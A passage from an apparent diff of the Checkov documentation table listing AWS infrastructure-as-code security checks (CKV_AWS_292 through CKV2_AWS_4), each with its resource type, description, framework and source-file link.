[MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterNodesArePrivate.py) | +| 732 | CKV_AWS_292 | resource | aws_docdb_global_cluster | Ensure DocumentDB Global Cluster is encrypted at rest (default is unencrypted) | Terraform | [DocDBGlobalClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBGlobalClusterEncryption.py) | +| 733 | CKV_AWS_293 | resource | aws_db_instance | Ensure that AWS database instances have deletion protection enabled | Terraform | [RDSInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceDeletionProtection.py) | +| 734 | CKV_AWS_294 | resource | aws_cloudtrail_event_data_store | Ensure CloudTrail Event Data Store uses CMK | Terraform | [CloudtrailEventDataStoreUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEventDataStoreUsesCMK.py) | +| 735 | CKV_AWS_295 | resource | aws_datasync_location_object_storage | Ensure DataSync Location Object Storage doesn't expose secrets | Terraform | [DatasyncLocationExposesSecrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DatasyncLocationExposesSecrets.py) | +| 736 | CKV_AWS_296 | resource | aws_dms_endpoint | Ensure DMS endpoint uses Customer Managed Key (CMK) | Terraform | [DMSEndpointUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSEndpointUsesCMK.py) | +| 737 | CKV_AWS_297 | resource | aws_scheduler_schedule | Ensure EventBridge Scheduler Schedule uses Customer Managed Key (CMK) | Terraform | [SchedulerScheduleUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SchedulerScheduleUsesCMK.py) | +| 738 | CKV_AWS_298 | resource | aws_dms_s3_endpoint | Ensure DMS S3 uses Customer Managed Key 
(CMK) | Terraform | [DMSS3UsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSS3UsesCMK.py) | +| 739 | CKV_AWS_300 | resource | aws_s3_bucket_lifecycle_configuration | Ensure S3 lifecycle configuration sets period for aborting failed uploads | Terraform | [S3AbortIncompleteUploads.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AbortIncompleteUploads.py) | +| 740 | CKV_AWS_301 | resource | aws_lambda_permission | Ensure that AWS Lambda function is not publicly accessible | Terraform | [LambdaFunctionIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionIsNotPublic.py) | +| 741 | CKV_AWS_302 | resource | aws_db_snapshot | Ensure DB Snapshots are not Public | Terraform | [DBSnapshotsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotsArePrivate.py) | +| 742 | CKV_AWS_303 | resource | aws_ssm_document | Ensure SSM documents are not Public | Terraform | [SSMDocumentsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMDocumentsArePrivate.py) | +| 743 | CKV_AWS_304 | resource | aws_secretsmanager_secret_rotation | Ensure Secrets Manager secrets should be rotated within 90 days | Terraform | [SecretManagerSecret90days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecret90days.py) | +| 744 | CKV_AWS_305 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has a default root object configured | Terraform | [CloudfrontDistributionDefaultRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionDefaultRoot.py) | +| 745 | CKV_AWS_306 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker notebook instances should be launched into a custom VPC | Terraform | 
[SagemakerNotebookInCustomVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookInCustomVPC.py) | +| 746 | CKV_AWS_307 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker Users should not have root access to SageMaker notebook instances | Terraform | [SagemakerNotebookRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookRoot.py) | +| 747 | CKV_AWS_308 | resource | aws_api_gateway_method_settings | Ensure API Gateway method setting caching is set to encrypted | Terraform | [APIGatewayMethodSettingsCacheEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEncrypted.py) | +| 748 | CKV_AWS_309 | resource | aws_apigatewayv2_route | Ensure API GatewayV2 routes specify an authorization type | Terraform | [APIGatewayV2RouteDefinesAuthorizationType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayV2RouteDefinesAuthorizationType.py) | +| 749 | CKV_AWS_310 | resource | aws_cloudfront_distribution | Ensure CloudFront distributions should have origin failover configured | Terraform | [CloudfrontDistributionOriginFailover.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionOriginFailover.py) | +| 750 | CKV_AWS_311 | resource | aws_codebuild_project | Ensure that CodeBuild S3 logs are encrypted | Terraform | [CodebuildS3LogsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildS3LogsEncrypted.py) | +| 751 | CKV_AWS_312 | resource | aws_elastic_beanstalk_environment | Ensure Elastic Beanstalk environments have enhanced health reporting enabled | Terraform | 
[ElasticBeanstalkUseEnhancedHealthChecks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseEnhancedHealthChecks.py) | +| 752 | CKV_AWS_313 | resource | aws_rds_cluster | Ensure RDS cluster configured to copy tags to snapshots | Terraform | [RDSClusterCopyTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterCopyTags.py) | +| 753 | CKV_AWS_314 | resource | aws_codebuild_project | Ensure CodeBuild project environments have a logging configuration | Terraform | [CodebuildHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildHasLogs.py) | +| 754 | CKV_AWS_315 | resource | aws_autoscaling_group | Ensure EC2 Auto Scaling groups use EC2 launch templates | Terraform | [AutoScalingLaunchTemplate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingLaunchTemplate.py) | +| 755 | CKV_AWS_316 | resource | aws_codebuild_project | Ensure CodeBuild project environments do not have privileged mode enabled | Terraform | [CodeBuildPrivilegedMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildPrivilegedMode.py) | +| 756 | CKV_AWS_317 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | +| 757 | CKV_AWS_317 | resource | AWS::OpenSearchService::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | +| 758 | CKV_AWS_317 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain Audit Logging is 
enabled | Terraform | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | +| 759 | CKV_AWS_317 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain Audit Logging is enabled | Terraform | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | +| 760 | CKV_AWS_318 | resource | aws_elasticsearch_domain | Ensure Elasticsearch domains are configured with at least three dedicated master nodes for HA | Terraform | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py) | +| 761 | CKV_AWS_318 | resource | aws_opensearch_domain | Ensure Elasticsearch domains are configured with at least three dedicated master nodes for HA | Terraform | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py) | +| 762 | CKV_AWS_319 | resource | aws_cloudwatch_metric_alarm | Ensure that CloudWatch alarm actions are enabled | Terraform | [CloudWatchAlarmsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchAlarmsEnabled.py) | +| 763 | CKV_AWS_320 | resource | aws_redshift_cluster | Ensure Redshift clusters do not use the default database name | Terraform | [RedshiftClusterDatabaseName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterDatabaseName.py) | +| 764 | CKV_AWS_321 | resource | aws_redshift_cluster | Ensure Redshift clusters use enhanced VPC routing | Terraform | [RedshiftClusterUseEnhancedVPCRouting.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterUseEnhancedVPCRouting.py) | +| 765 | CKV_AWS_322 | resource | 
aws_elasticache_cluster | Ensure ElastiCache for Redis cache clusters have auto minor version upgrades enabled | Terraform | [ElasticCacheAutomaticMinorUpgrades.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticMinorUpgrades.py) | +| 766 | CKV_AWS_323 | resource | aws_elasticache_cluster | Ensure ElastiCache clusters do not use the default subnet group | Terraform | [ElastiCacheHasCustomSubnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElastiCacheHasCustomSubnet.py) | +| 767 | CKV_AWS_324 | resource | aws_rds_cluster | Ensure that RDS Cluster log capture is enabled | Terraform | [RDSClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterLogging.py) | +| 768 | CKV_AWS_325 | resource | aws_rds_cluster | Ensure that RDS Cluster audit logging is enabled for MySQL engine | Terraform | [RDSClusterAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuditLogging.py) | +| 769 | CKV_AWS_326 | resource | aws_rds_cluster | Ensure that RDS Aurora Clusters have backtracking enabled | Terraform | [RDSClusterAuroraBacktrack.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuroraBacktrack.py) | +| 770 | CKV_AWS_327 | resource | aws_rds_cluster | Ensure RDS Clusters are encrypted using KMS CMKs | Terraform | [RDSClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncryptedWithCMK.py) | +| 771 | CKV_AWS_328 | resource | aws_alb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) | +| 772 | CKV_AWS_328 | resource | aws_elb | Ensure that ALB is configured with 
defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) | +| 773 | CKV_AWS_328 | resource | aws_lb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) | +| 774 | CKV_AWS_329 | resource | aws_efs_access_point | EFS access points should enforce a root directory | Terraform | [EFSAccessPointRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessPointRoot.py) | +| 775 | CKV_AWS_330 | resource | aws_efs_access_point | EFS access points should enforce a user identity | Terraform | [EFSAccessUserIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessUserIdentity.py) | +| 776 | CKV_AWS_331 | resource | aws_ec2_transit_gateway | Ensure Transit Gateways do not automatically accept VPC attachment requests | Terraform | [Ec2TransitGatewayAutoAccept.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/Ec2TransitGatewayAutoAccept.py) | +| 777 | CKV_AWS_332 | resource | aws_ecs_service | Ensure ECS Fargate services run on the latest Fargate platform version | Terraform | [ECSServiceFargateLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServiceFargateLatest.py) | +| 778 | CKV_AWS_333 | resource | aws_ecs_service | Ensure ECS services do not have public IP addresses assigned to them automatically | Terraform | [ECSServicePublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServicePublicIP.py) | +| 779 | CKV_AWS_334 | resource | aws_ecs_task_definition | Ensure ECS containers should run as non-privileged | Terraform | 
[ECSContainerPrivilege.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerPrivilege.py) |
+| 780 | CKV_AWS_335 | resource | aws_ecs_task_definition | Ensure ECS task definitions should not share the host's process namespace | Terraform | [ECSContainerHostProcess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerHostProcess.py) |
+| 781 | CKV_AWS_336 | resource | aws_ecs_task_definition | Ensure ECS containers are limited to read-only access to root filesystems | Terraform | [ECSContainerReadOnlyRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerReadOnlyRoot.py) |
+| 782 | CKV_AWS_337 | resource | aws_ssm_parameter | Ensure SSM parameters are using KMS CMK | Terraform | [SSMParameterUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMParameterUsesCMK.py) |
+| 783 | CKV_AWS_338 | resource | aws_cloudwatch_log_group | Ensure CloudWatch log groups retains logs for at least 1 year | Terraform | [CloudWatchLogGroupRetentionYear.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetentionYear.py) |
+| 784 | CKV_AWS_339 | resource | aws_eks_cluster | Ensure EKS clusters run on a supported Kubernetes version | Terraform | [EKSPlatformVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPlatformVersion.py) |
+| 785 | CKV_AWS_340 | resource | aws_elastic_beanstalk_environment | Ensure Elastic Beanstalk managed platform updates are enabled | Terraform | [ElasticBeanstalkUseManagedUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseManagedUpdates.py) |
+| 786 | CKV_AWS_341 | resource | aws_launch_configuration | Ensure Launch template should not have a metadata response hop limit greater than 
1 | Terraform | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py) |
+| 787 | CKV_AWS_341 | resource | aws_launch_template | Ensure Launch template should not have a metadata response hop limit greater than 1 | Terraform | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py) |
+| 788 | CKV_AWS_342 | resource | aws_waf_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) |
+| 789 | CKV_AWS_342 | resource | aws_waf_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) |
+| 790 | CKV_AWS_342 | resource | aws_wafregional_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) |
+| 791 | CKV_AWS_342 | resource | aws_wafregional_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) |
+| 792 | CKV_AWS_342 | resource | aws_wafv2_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) |
+| 793 | CKV_AWS_342 | resource | aws_wafv2_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) |
+| 794 | CKV_AWS_343 | resource | aws_redshift_cluster | Ensure 
Amazon Redshift clusters should have automatic snapshots enabled | Terraform | [RedshiftClusterAutoSnap.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAutoSnap.py) |
+| 795 | CKV_AWS_344 | resource | aws_networkfirewall_firewall | Ensure that Network firewalls have deletion protection enabled | Terraform | [NetworkFirewallDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallDeletionProtection.py) |
+| 796 | CKV_AWS_345 | resource | aws_networkfirewall_firewall | Ensure that Network firewall encryption is via a CMK | Terraform | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py) |
+| 797 | CKV_AWS_345 | resource | aws_networkfirewall_rule_group | Ensure that Network firewall encryption is via a CMK | Terraform | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py) |
+| 798 | CKV_AWS_346 | resource | aws_networkfirewall_firewall_policy | Ensure Network Firewall Policy defines an encryption configuration that uses a customer managed Key (CMK) | Terraform | [NetworkFirewallPolicyDefinesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallPolicyDefinesCMK.py) |
+| 799 | CKV_AWS_347 | resource | aws_neptune_cluster | Ensure Neptune is encrypted by KMS using a customer managed Key (CMK) | Terraform | [NeptuneClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterEncryptedWithCMK.py) |
+| 800 | CKV_AWS_348 | resource | aws_iam_access_key | Ensure IAM root user doesnt have Access keys | Terraform | 
[IAMUserRootAccessKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserRootAccessKeys.py) |
+| 801 | CKV_AWS_349 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts local disks | Terraform | [EMRClusterConfEncryptsLocalDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsLocalDisk.py) |
+| 802 | CKV_AWS_350 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts EBS disks | Terraform | [EMRClusterConfEncryptsEBS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsEBS.py) |
+| 803 | CKV_AWS_351 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts InTransit | Terraform | [EMRClusterConfEncryptsInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsInTransit.py) |
+| 804 | CKV_AWS_352 | resource | aws_network_acl_rule | Ensure NACL ingress does not allow all Ports | Terraform | [NetworkACLUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestricted.py) |
+| 805 | CKV_AWS_353 | resource | aws_db_instance | Ensure that RDS instances have performance insights enabled | Terraform | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py) |
+| 806 | CKV_AWS_353 | resource | aws_rds_cluster_instance | Ensure that RDS instances have performance insights enabled | Terraform | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py) |
+| 807 | CKV_AWS_354 | resource | aws_db_instance | Ensure RDS Performance Insights are encrypted using KMS 
CMKs | Terraform | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py) |
+| 808 | CKV_AWS_354 | resource | aws_rds_cluster_instance | Ensure RDS Performance Insights are encrypted using KMS CMKs | Terraform | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py) |
+| 809 | CKV_AWS_355 | resource | aws_iam_group_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) |
+| 810 | CKV_AWS_355 | resource | aws_iam_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) |
+| 811 | CKV_AWS_355 | resource | aws_iam_role_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) |
+| 812 | CKV_AWS_355 | resource | aws_iam_user_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) |
+| 813 | CKV_AWS_355 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | 
[IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) |
+| 814 | CKV_AWS_356 | data | aws_iam_policy_document | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [ResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/ResourcePolicyDocument.py) |
+| 815 | CKV_AWS_357 | resource | aws_transfer_server | Ensure Transfer Server allows only secure protocols | Terraform | [TransferServerAllowsOnlySecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerAllowsOnlySecureProtocols.py) |
+| 816 | CKV_AWS_358 | data | aws_iam_policy_document | Ensure GitHub Actions OIDC trust policies only allows actions from a specific known organization | Terraform | [GithubActionsOIDCTrustPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/GithubActionsOIDCTrustPolicy.py) |
+| 817 | CKV_AWS_359 | resource | aws_neptune_cluster | Neptune DB clusters should have IAM database authentication enabled | Terraform | [NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py) |
+| 818 | CKV_AWS_360 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB has an adequate backup retention period | Cloudformation | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBBackupRetention.py) |
+| 819 | CKV_AWS_360 | resource | aws_docdb_cluster | Ensure DocumentDB has an adequate backup retention period | Terraform | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBBackupRetention.py) |
+| 820 | CKV_AWS_361 | 
resource | AWS::Neptune::DBCluster | Ensure that Neptune DB cluster has automated backups enabled with adequate retention | Cloudformation | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterBackupRetention.py) |
+| 821 | CKV_AWS_361 | resource | aws_neptune_cluster | Ensure that Neptune DB cluster has automated backups enabled with adequate retention | Terraform | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterBackupRetention.py) |
+| 822 | CKV_AWS_362 | resource | aws_neptune_cluster | Neptune DB clusters should be configured to copy tags to snapshots | Terraform | [NeptuneDBClustersCopyTagsToSnapshots.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersCopyTagsToSnapshots.py) |
+| 823 | CKV_AWS_363 | resource | AWS::Lambda::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) |
+| 824 | CKV_AWS_363 | resource | AWS::Serverless::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) |
+| 825 | CKV_AWS_363 | resource | aws_lambda_function | Ensure Lambda Runtime is not deprecated | Terraform | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DeprecatedLambdaRuntime.py) |
+| 826 | CKV_AWS_364 | resource | AWS::Lambda::Permission | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount | Cloudformation | 
[LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py) |
+| 827 | CKV_AWS_364 | resource | aws_lambda_permission | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount | Terraform | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaServicePermission.py) |
+| 828 | CKV_AWS_365 | resource | aws_ses_configuration_set | Ensure SES Configuration Set enforces TLS usage | Terraform | [SesConfigurationSetDefinesTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SesConfigurationSetDefinesTLS.py) |
+| 829 | CKV_AWS_366 | resource | AWS::Cognito::IdentityPool | Ensure AWS Cognito identity pool does not allow unauthenticated guest access | Cloudformation | [CognitoUnauthenticatedIdentities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CognitoUnauthenticatedIdentities.py) |
+| 830 | CKV_AWS_366 | resource | aws_cognito_identity_pool | Ensure AWS Cognito identity pool does not allow unauthenticated guest access | Terraform | [CognitoUnauthenticatedIdentities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CognitoUnauthenticatedIdentities.py) |
+| 831 | CKV2_AWS_1 | resource | aws_network_acl | Ensure that all NACL are attached to subnets | Terraform | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml) |
+| 832 | CKV2_AWS_1 | resource | aws_subnet | Ensure that all NACL are attached to subnets | Terraform | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml) |
+| 833 | CKV2_AWS_2 | resource | aws_ebs_volume | Ensure that only encrypted EBS volumes are attached to 
EC2 instances | Terraform | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml) |
+| 834 | CKV2_AWS_2 | resource | aws_volume_attachment | Ensure that only encrypted EBS volumes are attached to EC2 instances | Terraform | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml) |
+| 835 | CKV2_AWS_3 | resource | aws_guardduty_detector | Ensure GuardDuty is enabled to specific org/region | Terraform | [GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml) |
+| 836 | CKV2_AWS_3 | resource | aws_guardduty_organization_configuration | Ensure GuardDuty is enabled to specific org/region | Terraform | [GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml) |
+| 837 | CKV2_AWS_4 | resource | aws_api_gateway_method_settings | Ensure API Gateway stage have logging level defined as appropriate | Terraform | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml) |
